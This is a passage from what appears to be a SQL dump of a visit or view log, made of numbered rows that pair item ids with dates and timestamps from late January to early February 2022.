12:38:57'),(43496,1602,1,'2022-01-26','2022-01-26 12:44:04'),(43497,2609,1,'2022-01-26','2022-01-26 12:56:14'),(43498,1711,1,'2022-01-26','2022-01-26 14:02:48'),(43499,1711,1,'2022-01-26','2022-01-26 14:03:06'),(43500,1711,1,'2022-01-26','2022-01-26 14:03:30'),(43501,4363,1,'2022-01-26','2022-01-26 14:06:41'),(43502,76,1,'2022-01-26','2022-01-26 14:07:41'),(43503,1582,1,'2022-01-26','2022-01-26 14:52:39'),(43504,1594,1,'2022-01-26','2022-01-26 15:33:22'),(43505,1612,1,'2022-01-26','2022-01-26 16:02:01'),(43506,84,1,'2022-01-26','2022-01-26 16:22:24'),(43507,87,1,'2022-01-26','2022-01-26 16:22:39'),(43508,89,1,'2022-01-26','2022-01-26 16:23:38'),(43509,68,1,'2022-01-26','2022-01-26 16:24:18'),(43510,76,1,'2022-01-26','2022-01-26 16:24:24'),(43511,2503,1,'2022-01-26','2022-01-26 16:25:21'),(43512,87,1,'2022-01-26','2022-01-26 16:27:11'),(43513,2775,1,'2022-01-26','2022-01-26 16:28:12'),(43514,89,1,'2022-01-26','2022-01-26 16:28:29'),(43515,91,1,'2022-01-26','2022-01-26 16:28:46'),(43516,2503,1,'2022-01-26','2022-01-26 16:28:56'),(43517,2503,1,'2022-01-26','2022-01-26 16:31:37'),(43518,91,1,'2022-01-26','2022-01-26 16:32:53'),(43519,1588,1,'2022-01-26','2022-01-26 17:05:44'),(43520,2309,1,'2022-01-26','2022-01-26 17:37:32'),(43521,2309,1,'2022-01-26','2022-01-26 17:38:20'),(43522,4400,1,'2022-01-26','2022-01-26 17:46:30'),(43523,1594,1,'2022-01-26','2022-01-26 18:21:21'),(43524,72,1,'2022-01-26','2022-01-26 18:46:59'),(43525,80,1,'2022-01-26','2022-01-26 19:12:05'),(43526,91,1,'2022-01-26','2022-01-26 19:16:03'),(43527,91,1,'2022-01-26','2022-01-26 19:22:41'),(43528,2063,1,'2022-01-26','2022-01-26 19:58:45'),(43529,1695,1,'2022-01-26','2022-01-26 20:11:57'),(43530,91,1,'2022-01-26','2022-01-26 20:13:35'),(43531,477,1,'2022-01-26','2022-01-26 20:22:03'),(43532,3030,1,'2022-01-26','2022-01-26 20:44:53'),(43533,3313,1,'2022-01-26','2022-01-26 21:29:52'),(43534,1586,1,'2022-01-26','2022-01-26 22:55:18'),(43535,108,1,'2022-01-26','2022-01-26 22:58:31'),(43536,1588,1,'2022-01-26','2022-01-26 23:10:39'),(43537,3531,1,'2022-01-27','2022-01-27 00:10:14'),(43538,72,1,'2022-01-27','2022-01-27 02:29:13'),(43539,1592,1,'2022-01-27','2022-01-27 06:29:57'),(43540,1598,1,'2022-01-27','2022-01-27 06:30:45'),(43541,1749,1,'2022-01-27','2022-01-27 06:49:51'),(43542,1715,1,'2022-01-27','2022-01-27 07:09:48'),(43543,1600,1,'2022-01-27','2022-01-27 07:35:01'),(43544,1747,1,'2022-01-27','2022-01-27 07:39:50'),(43545,1614,1,'2022-01-27','2022-01-27 07:49:49'),(43546,1600,1,'2022-01-27','2022-01-27 09:13:13'),(43547,2410,1,'2022-01-27','2022-01-27 09:21:30'),(43548,4457,1,'2022-01-27','2022-01-27 09:49:59'),(43549,2159,1,'2022-01-27','2022-01-27 10:00:54'),(43550,2159,1,'2022-01-27','2022-01-27 10:01:05'),(43551,1602,1,'2022-01-27','2022-01-27 10:12:46'),(43552,2617,1,'2022-01-27','2022-01-27 10:24:50'),(43553,3243,1,'2022-01-27','2022-01-27 10:41:00'),(43554,72,1,'2022-01-27','2022-01-27 10:48:43'),(43555,1586,1,'2022-01-27','2022-01-27 10:58:11'),(43556,4238,1,'2022-01-27','2022-01-27 11:52:55'),(43557,2148,1,'2022-01-27','2022-01-27 11:57:44'),(43558,2148,1,'2022-01-27','2022-01-27 12:01:05'),(43559,2148,1,'2022-01-27','2022-01-27 12:13:17'),(43560,1596,1,'2022-01-27','2022-01-27 12:23:30'),(43561,1600,1,'2022-01-27','2022-01-27 13:05:14'),(43562,4457,1,'2022-01-27','2022-01-27 13:46:42'),(43563,76,1,'2022-01-27','2022-01-27 13:47:03'),(43564,1722,1,'2022-01-27','2022-01-27 14:32:39'),(43565,91,1,'2022-01-27','2022-01-27 14:33:43'),(43566,1586,1,'2022-01-27','2022-01-27 15:00:46'),(43567,1598,1,'2022-01-27','2022-01-27 15:03:00'),(43568,2297,1,'2022-01-27','2022-01-27 15:04:51'),(43569,76,1,'2022-01-27','2022-01-27 16:33:01'),(43570,2769,1,'2022-01-27','2022-01-27 16:39:57'),(43571,3764,1,'2022-01-27','2022-01-27 17:17:09'),(43572,3764,1,'2022-01-27','2022-01-27 17:44:11'),(43573,477,1,'2022-01-27','2022-01-27 18:36:16'),(43574,1586,1,'2022-01-27','2022-01-27 18:58:17'),(43575,3102,1,'2022-01-27','2022-01-27 19:56:57'),(43576,1600,1,'2022-01-27','2022-01-27 20:38:45'),(43577,1608,1,'2022-01-27','2022-01-27 21:58:01'),(43578,1606,1,'2022-01-27','2022-01-27 22:00:30'),(43579,1598,1,'2022-01-27','2022-01-27 22:14:37'),(43580,108,1,'2022-01-27','2022-01-27 23:20:33'),(43581,2457,1,'2022-01-27','2022-01-27 23:47:49'),(43582,1596,1,'2022-01-28','2022-01-28 00:02:20'),(43583,1596,1,'2022-01-28','2022-01-28 00:02:27'),(43584,1596,1,'2022-01-28','2022-01-28 00:02:30'),(43585,1598,1,'2022-01-28','2022-01-28 02:05:17'),(43586,1594,1,'2022-01-28','2022-01-28 02:11:39'),(43587,1606,1,'2022-01-28','2022-01-28 02:49:56'),(43588,1606,1,'2022-01-28','2022-01-28 03:01:46'),(43589,72,1,'2022-01-28','2022-01-28 03:16:04'),(43590,1598,1,'2022-01-28','2022-01-28 03:48:11'),(43591,2420,1,'2022-01-28','2022-01-28 06:08:12'),(43592,1588,1,'2022-01-28','2022-01-28 06:22:54'),(43593,4428,1,'2022-01-28','2022-01-28 07:09:00'),(43594,1747,1,'2022-01-28','2022-01-28 07:14:53'),(43595,2809,1,'2022-01-28','2022-01-28 07:15:59'),(43596,1582,1,'2022-01-28','2022-01-28 07:29:32'),(43597,2503,1,'2022-01-28','2022-01-28 07:30:17'),(43598,80,1,'2022-01-28','2022-01-28 07:31:17'),(43599,3764,1,'2022-01-28','2022-01-28 07:53:05'),(43600,2503,1,'2022-01-28','2022-01-28 08:52:10'),(43601,1722,1,'2022-01-28','2022-01-28 08:54:33'),(43602,1722,1,'2022-01-28','2022-01-28 08:54:48'),(43603,2503,1,'2022-01-28','2022-01-28 09:04:54'),(43604,1586,1,'2022-01-28','2022-01-28 09:09:08'),(43605,4404,1,'2022-01-28','2022-01-28 09:09:10'),(43606,4404,1,'2022-01-28','2022-01-28 10:09:15'),(43607,1588,1,'2022-01-28','2022-01-28 10:31:08'),(43608,80,1,'2022-01-28','2022-01-28 10:31:19'),(43609,2410,1,'2022-01-28','2022-01-28 11:02:27'),(43610,1586,1,'2022-01-28','2022-01-28 11:18:57'),(43611,1594,1,'2022-01-28','2022-01-28 12:04:20'),(43612,1544,1,'2022-01-28','2022-01-28 12:12:57'),(43613,1606,1,'2022-01-28','2022-01-28 12:16:07'),(43614,1774,1,'2022-01-28','2022-01-28 12:28:32'),(43615,108,1,'2022-01-28','2022-01-28 12:42:57'),(43616,108,1,'2022-01-28','2022-01-28 12:46:03'),(43617,1586,1,'2022-01-28','2022-01-28 13:15:55'),(43618,1582,1,'2022-01-28','2022-01-28 13:37:55'),(43619,1724,1,'2022-01-28','2022-01-28 13:38:36'),(43620,1724,1,'2022-01-28','2022-01-28 13:42:19'),(43621,1724,1,'2022-01-28','2022-01-28 13:42:55'),(43622,1724,1,'2022-01-28','2022-01-28 13:44:43'),(43623,108,1,'2022-01-28','2022-01-28 13:45:53'),(43624,1612,1,'2022-01-28','2022-01-28 13:47:07'),(43625,80,1,'2022-01-28','2022-01-28 13:47:18'),(43626,3226,1,'2022-01-28','2022-01-28 14:07:54'),(43627,3041,1,'2022-01-28','2022-01-28 14:16:01'),(43628,2965,1,'2022-01-28','2022-01-28 14:40:28'),(43629,2965,1,'2022-01-28','2022-01-28 14:45:56'),(43630,4457,1,'2022-01-28','2022-01-28 15:01:40'),(43631,2769,1,'2022-01-28','2022-01-28 15:35:55'),(43632,1594,1,'2022-01-28','2022-01-28 15:38:28'),(43633,487,1,'2022-01-28','2022-01-28 15:51:17'),(43634,473,1,'2022-01-28','2022-01-28 15:51:18'),(43635,4457,1,'2022-01-28','2022-01-28 15:53:01'),(43636,1598,1,'2022-01-28','2022-01-28 16:05:56'),(43637,72,1,'2022-01-28','2022-01-28 17:32:54'),(43638,468,1,'2022-01-28','2022-01-28 17:35:54'),(43639,3691,1,'2022-01-28','2022-01-28 18:42:59'),(43640,1608,1,'2022-01-28','2022-01-28 19:04:38'),(43641,2558,1,'2022-01-28','2022-01-28 19:04:47'),(43642,1608,1,'2022-01-28','2022-01-28 19:04:50'),(43643,3707,1,'2022-01-28','2022-01-28 20:02:49'),(43644,1699,1,'2022-01-28','2022-01-28 20:16:42'),(43645,3083,1,'2022-01-28','2022-01-28 20:30:17'),(43646,1778,1,'2022-01-28','2022-01-28 21:16:33'),(43647,1720,1,'2022-01-28','2022-01-28 21:17:07'),(43648,4420,1,'2022-01-28','2022-01-28 21:26:28'),(43649,2309,1,'2022-01-28','2022-01-28 21:41:27'),(43650,72,1,'2022-01-28','2022-01-28 21:56:29'),(43651,3072,1,'2022-01-28','2022-01-28 22:05:59'),(43652,2503,1,'2022-01-28','2022-01-28 22:16:32'),(43653,3051,1,'2022-01-28','2022-01-28 22:16:33'),(43654,4301,1,'2022-01-28','2022-01-28 22:16:36'),(43655,473,1,'2022-01-28','2022-01-28 22:41:27'),(43656,1594,1,'2022-01-28','2022-01-28 22:56:40'),(43657,2309,1,'2022-01-28','2022-01-28 23:01:18'),(43658,4457,1,'2022-01-28','2022-01-28 23:19:14'),(43659,1602,1,'2022-01-29','2022-01-29 00:12:30'),(43660,2309,1,'2022-01-29','2022-01-29 00:28:44'),(43661,2297,1,'2022-01-29','2022-01-29 00:54:37'),(43662,76,1,'2022-01-29','2022-01-29 00:56:32'),(43663,80,1,'2022-01-29','2022-01-29 00:58:38'),(43664,68,1,'2022-01-29','2022-01-29 00:58:57'),(43665,91,1,'2022-01-29','2022-01-29 00:59:53'),(43666,4448,1,'2022-01-29','2022-01-29 01:00:34'),(43667,4546,1,'2022-01-29','2022-01-29 01:03:31'),(43668,4416,1,'2022-01-29','2022-01-29 01:05:58'),(43669,91,1,'2022-01-29','2022-01-29 01:06:34'),(43670,4412,1,'2022-01-29','2022-01-29 01:07:17'),(43671,91,1,'2022-01-29','2022-01-29 01:07:27'),(43672,4420,1,'2022-01-29','2022-01-29 01:07:44'),(43673,4420,1,'2022-01-29','2022-01-29 01:07:45'),(43674,91,1,'2022-01-29','2022-01-29 01:27:15'),(43675,4404,1,'2022-01-29','2022-01-29 01:27:40'),(43676,4432,1,'2022-01-29','2022-01-29 01:28:06'),(43677,4432,1,'2022-01-29','2022-01-29 01:28:06'),(43678,91,1,'2022-01-29','2022-01-29 01:29:01'),(43679,4556,1,'2022-01-29','2022-01-29 01:29:20'),(43680,4556,1,'2022-01-29','2022-01-29 01:29:22'),(43681,108,1,'2022-01-29','2022-01-29 01:30:22'),(43682,72,1,'2022-01-29','2022-01-29 01:32:12'),(43683,4561,1,'2022-01-29','2022-01-29 01:33:46'),(43684,74,1,'2022-01-29','2022-01-29 01:38:32'),(43685,1724,1,'2022-01-29','2022-01-29 02:06:00'),(43686,3267,1,'2022-01-29','2022-01-29 05:03:46'),(43687,3489,1,'2022-01-29','2022-01-29 05:18:41'),(43688,1586,1,'2022-01-29','2022-01-29 05:23:35'),(43689,1734,1,'2022-01-29','2022-01-29 06:01:31'),(43690,2993,1,'2022-01-29','2022-01-29 06:52:08'),(43691,4338,1,'2022-01-29','2022-01-29 07:17:23'),(43692,468,1,'2022-01-29','2022-01-29 07:31:58'),(43693,1594,1,'2022-01-29','2022-01-29 08:01:58'),(43694,72,1,'2022-01-29','2022-01-29 08:17:13'),(43695,2297,1,'2022-01-29','2022-01-29 09:15:57'),(43696,4238,1,'2022-01-29','2022-01-29 09:17:26'),(43697,2154,1,'2022-01-29','2022-01-29 10:15:59'),(43698,4391,1,'2022-01-29','2022-01-29 10:45:59'),(43699,3053,1,'2022-01-29','2022-01-29 11:14:57'),(43700,1877,1,'2022-01-29','2022-01-29 11:43:11'),(43701,1582,1,'2022-01-29','2022-01-29 11:44:26'),(43702,91,1,'2022-01-29','2022-01-29 11:45:54'),(43703,4457,1,'2022-01-29','2022-01-29 12:33:54'),(43704,68,1,'2022-01-29','2022-01-29 12:56:08'),(43705,80,1,'2022-01-29','2022-01-29 13:31:46'),(43706,2309,1,'2022-01-29','2022-01-29 13:43:58'),(43707,4335,1,'2022-01-29','2022-01-29 13:55:05'),(43708,91,1,'2022-01-29','2022-01-29 15:06:02'),(43709,72,1,'2022-01-29','2022-01-29 15:08:24'),(43710,4457,1,'2022-01-29','2022-01-29 16:14:51'),(43711,2769,1,'2022-01-29','2022-01-29 16:37:20'),(43712,2154,1,'2022-01-29','2022-01-29 19:34:49'),(43713,2154,1,'2022-01-29','2022-01-29 19:35:21'),(43714,2154,1,'2022-01-29','2022-01-29 19:35:44'),(43715,2904,1,'2022-01-29','2022-01-29 19:36:10'),(43716,2154,1,'2022-01-29','2022-01-29 19:36:27'),(43717,2410,1,'2022-01-29','2022-01-29 19:47:11'),(43718,1604,1,'2022-01-29','2022-01-29 20:42:49'),(43719,3226,1,'2022-01-29','2022-01-29 22:01:51'),(43720,3226,1,'2022-01-29','2022-01-29 22:03:24'),(43721,1606,1,'2022-01-29','2022-01-29 22:04:02'),(43722,80,1,'2022-01-29','2022-01-29 22:23:10'),(43723,1732,1,'2022-01-29','2022-01-29 23:07:56'),(43724,1596,1,'2022-01-29','2022-01-29 23:08:28'),(43725,1732,1,'2022-01-29','2022-01-29 23:34:01'),(43726,72,1,'2022-01-29','2022-01-29 23:38:13'),(43727,3072,1,'2022-01-30','2022-01-30 00:03:59'),(43728,1608,1,'2022-01-30','2022-01-30 00:15:11'),(43729,2809,1,'2022-01-30','2022-01-30 00:15:14'),(43730,1592,1,'2022-01-30','2022-01-30 00:52:59'),(43731,1608,1,'2022-01-30','2022-01-30 01:15:54'),(43732,3109,1,'2022-01-30','2022-01-30 01:32:37'),(43733,2297,1,'2022-01-30','2022-01-30 01:42:35'),(43734,1610,1,'2022-01-30','2022-01-30 02:01:11'),(43735,1730,1,'2022-01-30','2022-01-30 02:15:09'),(43736,1602,1,'2022-01-30','2022-01-30 02:34:23'),(43737,1602,1,'2022-01-30','2022-01-30 02:34:36'),(43738,108,1,'2022-01-30','2022-01-30 02:36:05'),(43739,1602,1,'2022-01-30','2022-01-30 02:39:28'),(43740,1606,1,'2022-01-30','2022-01-30 03:36:01'),(43741,3124,1,'2022-01-30','2022-01-30 04:05:01'),(43742,108,1,'2022-01-30','2022-01-30 04:36:01'),(43743,1699,1,'2022-01-30','2022-01-30 05:06:29'),(43744,3117,1,'2022-01-30','2022-01-30 06:28:05'),(43745,2558,1,'2022-01-30','2022-01-30 06:33:01'),(43746,570,1,'2022-01-30','2022-01-30 07:03:01'),(43747,1606,1,'2022-01-30','2022-01-30 07:06:01'),(43748,4404,1,'2022-01-30','2022-01-30 08:05:03'),(43749,2804,1,'2022-01-30','2022-01-30 08:25:01'),(43750,3430,1,'2022-01-30','2022-01-30 09:18:02'),(43751,2658,1,'2022-01-30','2022-01-30 09:48:01'),(43752,4428,1,'2022-01-30','2022-01-30 10:05:04'),(43753,1718,1,'2022-01-30','2022-01-30 10:18:20'),(43754,2617,1,'2022-01-30','2022-01-30 10:40:10'),(43755,478,1,'2022-01-30','2022-01-30 11:05:02'),(43756,1586,1,'2022-01-30','2022-01-30 11:50:44'),(43757,1602,1,'2022-01-30','2022-01-30 12:00:24'),(43758,1598,1,'2022-01-30','2022-01-30 12:07:09'),(43759,3541,1,'2022-01-30','2022-01-30 12:15:19'),(43760,3178,1,'2022-01-30','2022-01-30 12:28:48'),(43761,76,1,'2022-01-30','2022-01-30 12:52:55'),(43762,468,1,'2022-01-30','2022-01-30 13:08:33'),(43763,1772,1,'2022-01-30','2022-01-30 13:16:54'),(43764,3245,1,'2022-01-30','2022-01-30 13:18:30'),(43765,472,1,'2022-01-30','2022-01-30 14:13:05'),(43766,1614,1,'2022-01-30','2022-01-30 15:04:43'),(43767,1602,1,'2022-01-30','2022-01-30 15:08:04'),(43768,1703,1,'2022-01-30','2022-01-30 15:23:05'),(43769,1544,1,'2022-01-30','2022-01-30 16:28:05'),(43770,1610,1,'2022-01-30','2022-01-30 16:38:05'),(43771,1544,1,'2022-01-30','2022-01-30 16:58:05'),(43772,1582,1,'2022-01-30','2022-01-30 17:04:41'),(43773,3069,1,'2022-01-30','2022-01-30 17:21:22'),(43774,1709,1,'2022-01-30','2022-01-30 18:28:08'),(43775,484,1,'2022-01-30','2022-01-30 19:18:06'),(43776,1586,1,'2022-01-30','2022-01-30 19:27:03'),(43777,1586,1,'2022-01-30','2022-01-30 19:27:04'),(43778,1699,1,'2022-01-30','2022-01-30 19:28:05'),(43779,3079,1,'2022-01-30','2022-01-30 19:38:52'),(43780,3127,1,'2022-01-30','2022-01-30 20:03:49'),(43781,2904,1,'2022-01-30','2022-01-30 20:07:45'),(43782,1602,1,'2022-01-30','2022-01-30 20:25:11'),(43783,3257,1,'2022-01-30','2022-01-30 20:55:14'),(43784,1600,1,'2022-01-30','2022-01-30 21:16:40'),(43785,3045,1,'2022-01-30','2022-01-30 21:46:43'),(43786,1596,1,'2022-01-30','2022-01-30 21:46:44'),(43787,472,1,'2022-01-30','2022-01-30 21:58:06'),(43788,72,1,'2022-01-30','2022-01-30 22:26:40'),(43789,1600,1,'2022-01-30','2022-01-30 22:35:26'),(43790,1594,1,'2022-01-30','2022-01-30 22:50:57'),(43791,3691,1,'2022-01-30','2022-01-30 23:05:08'),(43792,3051,1,'2022-01-30','2022-01-30 23:15:58'),(43793,1602,1,'2022-01-30','2022-01-30 23:23:53'),(43794,2813,1,'2022-01-30','2022-01-30 23:33:38'),(43795,76,1,'2022-01-30','2022-01-30 23:36:04'),(43796,3438,1,'2022-01-30','2022-01-30 23:47:51'),(43797,72,1,'2022-01-31','2022-01-31 00:15:58'),(43798,1720,1,'2022-01-31','2022-01-31 01:47:51'),(43799,1778,1,'2022-01-31','2022-01-31 01:49:20'),(43800,1778,1,'2022-01-31','2022-01-31 01:51:55'),(43801,80,1,'2022-01-31','2022-01-31 02:28:12'),(43802,1772,1,'2022-01-31','2022-01-31 02:52:10'),(43803,4238,1,'2022-01-31','2022-01-31 05:18:22'),(43804,3482,1,'2022-01-31','2022-01-31 05:48:11'),(43805,2911,1,'2022-01-31','2022-01-31 05:59:36'),(43806,2804,1,'2022-01-31','2022-01-31 06:05:03'),(43807,3774,1,'2022-01-31','2022-01-31 06:14:25'),(43808,487,1,'2022-01-31','2022-01-31 06:18:10'),(43809,1870,1,'2022-01-31','2022-01-31 06:18:11'),(43810,4332,1,'2022-01-31','2022-01-31 06:21:52'),(43811,2993,1,'2022-01-31','2022-01-31 06:48:54'),(43812,3774,1,'2022-01-31','2022-01-31 07:00:36'),(43813,3710,1,'2022-01-31','2022-01-31 07:12:45'),(43814,1606,1,'2022-01-31','2022-01-31 07:55:21'),(43815,2769,1,'2022-01-31','2022-01-31 08:02:18'),(43816,2775,1,'2022-01-31','2022-01-31 08:15:54'),(43817,4238,1,'2022-01-31','2022-01-31 08:23:35'),(43818,72,1,'2022-01-31','2022-01-31 09:03:22'),(43819,2178,1,'2022-01-31','2022-01-31 09:10:30'),(43820,3226,1,'2022-01-31','2022-01-31 09:51:40'),(43821,2297,1,'2022-01-31','2022-01-31 10:08:06'),(43822,4238,1,'2022-01-31','2022-01-31 10:08:09'),(43823,3479,1,'2022-01-31','2022-01-31 10:18:09'),(43824,2503,1,'2022-01-31','2022-01-31 10:29:44'),(43825,4448,1,'2022-01-31','2022-01-31 10:38:06'),(43826,2297,1,'2022-01-31','2022-01-31 10:38:09'),(43827,2154,1,'2022-01-31','2022-01-31 11:08:07'),(43828,4457,1,'2022-01-31','2022-01-31 11:50:21'),(43829,467,1,'2022-01-31','2022-01-31 12:10:09'),(43830,1594,1,'2022-01-31','2022-01-31 12:24:12'),(43831,87,1,'2022-01-31','2022-01-31 12:25:10'),(43832,2617,1,'2022-01-31','2022-01-31 12:41:35'),(43833,3752,1,'2022-01-31','2022-01-31 12:47:12'),(43834,1602,1,'2022-01-31','2022-01-31 12:47:35'),(43835,4457,1,'2022-01-31','2022-01-31 12:50:36'),(43836,4357,1,'2022-01-31','2022-01-31 12:59:53'),(43837,1768,1,'2022-01-31','2022-01-31 13:12:53'),(43838,3267,1,'2022-01-31','2022-01-31 13:31:01'),(43839,1602,1,'2022-01-31','2022-01-31 13:46:04'),(43840,68,1,'2022-01-31','2022-01-31 13:46:49'),(43841,76,1,'2022-01-31','2022-01-31 13:48:35'),(43842,3764,1,'2022-01-31','2022-01-31 13:51:51'),(43843,3781,1,'2022-01-31','2022-01-31 13:59:51'),(43844,1598,1,'2022-01-31','2022-01-31 14:06:15'),(43845,2457,1,'2022-01-31','2022-01-31 14:12:45'),(43846,1598,1,'2022-01-31','2022-01-31 14:30:20'),(43847,472,1,'2022-01-31','2022-01-31 14:38:09'),(43848,2309,1,'2022-01-31','2022-01-31 14:51:05'),(43849,1612,1,'2022-01-31','2022-01-31 15:07:37'),(43850,3285,1,'2022-01-31','2022-01-31 15:07:47'),(43851,1614,1,'2022-01-31','2022-01-31 15:10:35'),(43852,3746,1,'2022-01-31','2022-01-31 15:37:17'),(43853,4510,1,'2022-01-31','2022-01-31 16:01:04'),(43854,4514,1,'2022-01-31','2022-01-31 16:01:25'),(43855,3251,1,'2022-01-31','2022-01-31 16:20:33'),(43856,3290,1,'2022-01-31','2022-01-31 16:34:07'),(43857,1594,1,'2022-01-31','2022-01-31 17:03:56'),(43858,2704,1,'2022-01-31','2022-01-31 17:37:25'),(43859,2309,1,'2022-01-31','2022-01-31 18:03:54'),(43860,72,1,'2022-01-31','2022-01-31 18:13:53'),(43861,3004,1,'2022-01-31','2022-01-31 18:37:19'),(43862,1612,1,'2022-01-31','2022-01-31 19:33:57'),(43863,3313,1,'2022-01-31','2022-01-31 20:36:09'),(43864,1728,1,'2022-01-31','2022-01-31 20:46:11'),(43865,2704,1,'2022-01-31','2022-01-31 21:06:22'),(43866,3072,1,'2022-01-31','2022-01-31 21:52:57'),(43867,1606,1,'2022-01-31','2022-01-31 22:22:57'),(43868,472,1,'2022-01-31','2022-01-31 22:56:21'),(43869,2769,1,'2022-01-31','2022-01-31 23:14:01'),(43870,1602,1,'2022-01-31','2022-01-31 23:23:00'),(43871,1732,1,'2022-01-31','2022-01-31 23:52:57'),(43872,3072,1,'2022-02-01','2022-02-01 00:22:57'),(43873,108,1,'2022-02-01','2022-02-01 01:53:01'),(43874,72,1,'2022-02-01','2022-02-01 02:10:44'),(43875,4542,1,'2022-02-01','2022-02-01 02:36:34'),(43876,2159,1,'2022-02-01','2022-02-01 03:02:25'),(43877,1606,1,'2022-02-01','2022-02-01 03:52:58'),(43878,2159,1,'2022-02-01','2022-02-01 04:02:41'),(43879,2159,1,'2022-02-01','2022-02-01 04:02:57'),(43880,1594,1,'2022-02-01','2022-02-01 04:32:25'),(43881,1606,1,'2022-02-01','2022-02-01 04:52:59'),(43882,1608,1,'2022-02-01','2022-02-01 05:01:06'),(43883,3273,1,'2022-02-01','2022-02-01 05:08:15'),(43884,1718,1,'2022-02-01','2022-02-01 05:15:16'),(43885,1592,1,'2022-02-01','2022-02-01 05:22:26'),(43886,570,1,'2022-02-01','2022-02-01 05:36:37'),(43887,1877,1,'2022-02-01','2022-02-01 05:57:56'),(43888,2558,1,'2022-02-01','2022-02-01 06:26:23'),(43889,472,1,'2022-02-01','2022-02-01 06:40:35'),(43890,3673,1,'2022-02-01','2022-02-01 07:09:01'),(43891,1586,1,'2022-02-01','2022-02-01 07:15:41'),(43892,2419,1,'2022-02-01','2022-02-01 07:23:13'),(43893,2965,1,'2022-02-01','2022-02-01 07:37:47'),(43894,1730,1,'2022-02-01','2022-02-01 07:47:57'),(43895,1711,1,'2022-02-01','2022-02-01 07:51:41'),(43896,3069,1,'2022-02-01','2022-02-01 08:34:18'),(43897,469,1,'2022-02-01','2022-02-01 08:48:31'),(43898,1602,1,'2022-02-01','2022-02-01 09:15:20'),(43899,3247,1,'2022-02-01','2022-02-01 09:16:56'),(43900,1766,1,'2022-02-01','2022-02-01 09:31:11'),(43901,2704,1,'2022-02-01','2022-02-01 09:34:09'),(43902,2309,1,'2022-02-01','2022-02-01 10:03:32'),(43903,3438,1,'2022-02-01','2022-02-01 10:13:49'),(43904,1608,1,'2022-02-01','2022-02-01 10:15:48'),(43905,2617,1,'2022-02-01','2022-02-01 10:30:58'),(43906,2617,1,'2022-02-01','2022-02-01 10:31:12'),(43907,3027,1,'2022-02-01','2022-02-01 10:39:32'),(43908,470,1,'2022-02-01','2022-02-01 11:05:36'),(43909,1598,1,'2022-02-01','2022-02-01 11:48:09'),(43910,4404,1,'2022-02-01','2022-02-01 11:48:38'),(43911,1770,1,'2022-02-01','2022-02-01 11:53:43'),(43912,4428,1,'2022-02-01','2022-02-01 12:11:03'),(43913,1602,1,'2022-02-01','2022-02-01 12:14:28'),(43914,2420,1,'2022-02-01','2022-02-01 12:25:31'),(43915,3243,1,'2022-02-01','2022-02-01 12:30:32'),(43916,3023,1,'2022-02-01','2022-02-01 12:40:47'),(43917,3178,1,'2022-02-01','2022-02-01 12:49:38'),(43918,1594,1,'2022-02-01','2022-02-01 12:52:52'),(43919,3245,1,'2022-02-01','2022-02-01 13:02:15'),(43920,2248,1,'2022-02-01','2022-02-01 13:13:50'),(43921,2813,1,'2022-02-01','2022-02-01 13:23:06'),(43922,76,1,'2022-02-01','2022-02-01 13:24:58'),(43923,4520,1,'2022-02-01','2022-02-01 13:39:36'),(43924,4520,1,'2022-02-01','2022-02-01 13:42:49'),(43925,4524,1,'2022-02-01','2022-02-01 13:48:09'),(43926,478,1,'2022-02-01','2022-02-01 13:59:22'),(43927,1782,1,'2022-02-01','2022-02-01 14:13:48'),(43928,4529,1,'2022-02-01','2022-02-01 14:30:59'),(43929,1612,1,'2022-02-01','2022-02-01 14:48:06'),(43930,1602,1,'2022-02-01','2022-02-01 14:49:44'),(43931,1586,1,'2022-02-01','2022-02-01 15:06:19'),(43932,1737,1,'2022-02-01','2022-02-01 15:19:28'),(43933,1737,1,'2022-02-01','2022-02-01 15:20:22'),(43934,1703,1,'2022-02-01','2022-02-01 15:22:24'),(43935,1582,1,'2022-02-01','2022-02-01 15:39:32'),(43936,3090,1,'2022-02-01','2022-02-01 15:56:41'),(43937,2769,1,'2022-02-01','2022-02-01 16:36:41'),(43938,72,1,'2022-02-01','2022-02-01 16:48:13'),(43939,3253,1,'2022-02-01','2022-02-01 17:16:41'),(43940,1594,1,'2022-02-01','2022-02-01 17:36:40'),(43941,1612,1,'2022-02-01','2022-02-01 17:56:54'),(43942,474,1,'2022-02-01','2022-02-01 18:36:05'),(43943,1780,1,'2022-02-01','2022-02-01 18:36:40'),(43944,3479,1,'2022-02-01','2022-02-01 18:58:40'),(43945,1695,1,'2022-02-01','2022-02-01 19:06:12'),(43946,1592,1,'2022-02-01','2022-02-01 19:58:07'),(43947,87,1,'2022-02-01','2022-02-01 19:58:19'),(43948,471,1,'2022-02-01','2022-02-01 19:59:01'),(43949,3104,1,'2022-02-01','2022-02-01 20:16:41'),(43950,4391,1,'2022-02-01','2022-02-01 20:28:42'),(43951,3674,1,'2022-02-01','2022-02-01 20:36:39'),(43952,3107,1,'2022-02-01','2022-02-01 21:16:40'),(43953,2293,1,'2022-02-01','2022-02-01 21:18:14'),(43954,3102,1,'2022-02-01','2022-02-01 21:21:10'),(43955,3060,1,'2022-02-01','2022-02-01 21:33:42'),(43956,3127,1,'2022-02-01','2022-02-01 21:36:39'),(43957,2989,1,'2022-02-01','2022-02-01 21:46:40'),(43958,2748,1,'2022-02-01','2022-02-01 21:58:00'),(43959,4448,1,'2022-02-01','2022-02-01 22:05:01'),(43960,1600,1,'2022-02-01','2022-02-01 22:10:20'),(43961,3045,1,'2022-02-01','2022-02-01 22:40:13'),(43962,1596,1,'2022-02-01','2022-02-01 22:40:57'),(43963,1872,1,'2022-02-01','2022-02-01 22:54:40'),(43964,3710,1,'2022-02-01','2022-02-01 22:58:06'),(43965,3045,1,'2022-02-01','2022-02-01 23:24:41'),(43966,3789,1,'2022-02-01','2022-02-01 23:41:00'),(43967,1606,1,'2022-02-01','2022-02-01 23:54:35'),(43968,2297,1,'2022-02-01','2022-02-01 23:54:37'),(43969,3087,1,'2022-02-01','2022-02-01 23:54:39'),(43970,72,1,'2022-02-01','2022-02-01 23:56:08'),(43971,1602,1,'2022-02-02','2022-02-02 00:06:32'),(43972,2154,1,'2022-02-02','2022-02-02 00:24:37'),(43973,72,1,'2022-02-02','2022-02-02 00:25:00'),(43974,1602,1,'2022-02-02','2022-02-02 00:31:17'),(43975,4416,1,'2022-02-02','2022-02-02 00:32:07'),(43976,1699,1,'2022-02-02','2022-02-02 00:54:35'),(43977,3051,1,'2022-02-02','2022-02-02 00:55:06'),(43978,2813,1,'2022-02-02','2022-02-02 01:04:31'),(43979,1602,1,'2022-02-02','2022-02-02 01:19:32'),(43980,2457,1,'2022-02-02','2022-02-02 01:34:32'),(43981,1732,1,'2022-02-02','2022-02-02 